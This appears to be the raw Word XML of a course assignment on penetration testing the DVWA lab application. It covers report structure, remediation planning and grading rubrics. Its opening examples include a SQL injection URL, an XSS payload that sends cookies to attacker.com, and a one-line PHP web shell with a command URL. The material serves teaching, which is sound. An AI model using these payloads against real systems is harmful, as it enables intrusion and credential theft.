    <w:p w14:paraId="39CCEFF5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 Data Extraction Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061E6C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SQL Injection - Extract database version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583C57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http://target/search.php?id=1' UNION SELECT version(),2,3 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E043891" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FAE6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XSS - Steal cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E72FF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14:paraId="6CC3DA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fetch('http://attacker.com/steal?c=' + document.cookie);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B2DA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14:paraId="5877BB20" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04529B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File Upload - Web Shell RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701BFF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Upload shell.php containing: &lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D179D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Access: http://target/uploads/shell.php?cmd=whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFC9C61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 Evidence Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F07F381" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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successful SQL injection query results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F157387" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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XSS alert or data theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FDEFD0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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web shell command execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE5DC60" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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 of CSRF token bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0944123D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Network traffic showing exploitation (Burp suite)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137C6CF4" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Server logs showing exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C885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4: Professional Report Writing (25%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B80259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4.1 Executive Summary (1 page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733ECA66" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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High-level overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE7A27D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Total vulnerabilities found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335183EE" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Overall risk assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593F183A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Estimated remediation effort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64914FF2" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Business impact statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B4DFD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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FB13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EXECUTIVE SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1933156F" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CA104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This assessment identified 7 critical vulnerabilities in the DVWA application,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDF3C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presenting extreme security risk. An attacker with network access can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78144F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Gain complete database access within minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E40BA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Execute arbitrary code on the application server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544430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Compromise all user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570422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Modify or delete critical data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B5A0DF" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E980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Immediate remediation is CRITICAL. Estimated remediation: 40-60 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F940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OVERALL RISK RATING: CRITICAL (9.8/10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333B237A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4.2 Detailed Findings Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECCBF1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For each vulnerability include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCB7893" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Vulnerability ID and title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD6145" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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CVSS score and severity rating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E93A94" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Detailed description (2-3 paragraphs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C79278A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Step-by-step reproduction guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEEC8ED" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Proof of concept code/screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399F063D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Business impact assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF1958" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Remediation recommendations with code examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523C0DE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4.3 Remediation Roadmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED1A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IMMEDIATE (24-48 hours):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770F15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Patch SQL injection with parameterized queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A9BF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Implement output encoding for XSS prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43309D7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Add CSRF tokens to all state-changing operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B152D87" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36806B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SHORT-TERM (1-2 weeks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A28D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Implement Web Application Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E9D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Add security headers (CSP, X-Frame-Options, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB4A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Conduct security code review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474A3788" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05412E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MEDIUM-TERM (1-2 months):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309FEE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Implement security testing in CI/CD pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027AA2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Security training for development team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C0ED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Third-party penetration testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456D72C2" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D85A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LONG-TERM (ongoing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1103EC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Bug bounty program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E99CE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Regular security assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D80DD5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- Keep components updated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B76E46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4.4 Report Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0E6B51" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Title Page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2% of grade)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3737CDE1" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Assessment date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E20734" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Target application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B4741" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Penetration tester name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51298212" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Confidentiality notice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406FD73D" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Table of Contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (1%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA10BD0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Executive summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464EFD6F" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D611E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6394EA" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Executive Summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (15%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3354A6C1" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Overview of assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E1A78" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Critical findings summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539A5E0F" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Risk overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641757F0" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Detailed Findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (50%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E958101" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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5-7 vulnerabilities with complete documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7882F600" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Screenshots and evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53245AE8" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Exploitation steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C04854" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Impact analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA39462" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Remediation Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (20%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51805395" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Priority-based recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43136F1E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Code examples for fixes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9AB2A1" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Implementation timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3B76F" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Testing strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760FB35" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Appendices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9210F3" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Tool output logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A0F4F3" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Additional screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE1CA5E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Technical glossary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1D6BE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 5: Submission Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C1BBE9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Deliverables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6452B38E" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Technical Report (PDF)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 15-25 pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BF4D97" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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All sections above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D106F1F" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Professional formatting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A83ED3A" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Clear, technical writing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22309261" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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lastRenderedPageBreak/>
        <w:t>Evidence Folder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Screenshots/Video</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6C5194" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Each vulnerability demonstration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22827967" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Burp Suite captures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027827B5" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Database dumps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56980293" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Web shell access proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7A79C" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Exploit Scripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if applicable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD5CCDC" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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SQLi extraction script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5720EECF" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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XSS payload testing script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257661B4" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Automated enumeration script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498EFC73" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Video Walkthrough</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Optional, 5-10 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D779B40" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Live demonstration of vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408BA710" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Exploitation walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4894EF39" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0000000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Impact demonstration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA327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Grading Rubric (3% of Total 100%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605E505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Vulnerability Identification (40%)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878"/>
        <w:gridCol w:w="6142"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="11BA6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C653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3104638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106BC6E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Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="07D8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2A6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 distinct vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54E1011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35-40%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56F4C93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Complete and accurate identification of all major vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="1EB0F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52D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5-6 vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3738E50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28-34%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CB674F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Good coverage with minor gaps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="0C9DF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7FD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3-4 vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F8408E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20-27%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6756EBB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Adequate identification of main vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="18B14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A1F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1-2 vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B6BE52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10-19%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25430F5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Limited findings, missing critical issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3B752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029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vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="133B1C9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DC3CBF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Failed to identify any vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="183971CA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Exploitation &amp; Proof of Concept (30%)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883"/>
        <w:gridCol w:w="4339"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="2456E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F0D3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183A4DE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0FCC1BE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Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="39BAB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0D7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Working exploits for all vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09FF8E8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28-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>30%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C0AE9D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Complete exploitation with clear PoC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3841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0BF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Working exploits for 80%+ vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="104717B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24-27%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126498A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Most vulnerabilities successfully exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="1CC3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CA6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Working exploits for 60%+ vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65E4E60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18-23%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1959955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Good exploitation coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="7303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47B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Working exploits for &lt;60%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67C8EAB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10-17%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21E1EB1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Limited successful exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="57AD1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49C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working exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F222DA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D3F7D0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Failed to demonstrate exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25D3A1B3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Documentation Quality (20%)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873"/>
        <w:gridCol w:w="5121"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="4E91A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F209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6AC18B5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1E0C07B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Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="46E25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7D2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Professional report, clear writing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38E0572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18-20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="117B6BC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Well-organized, technically sound, grammar excellent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="0E98D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1A1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Good documentation, minor issues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20548B2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14-17%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="666A144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Clear structure, few grammatical errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="0A00A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B0E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Adequate documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C6E3E2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10-13%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C523D2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Understandable but lacks polish</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="5D814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268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Poor documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="772BFCC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5-9%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D8D36E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Difficult to follow, multiple errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="4AF6D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FB4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Minimal documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63542AC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0-4%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
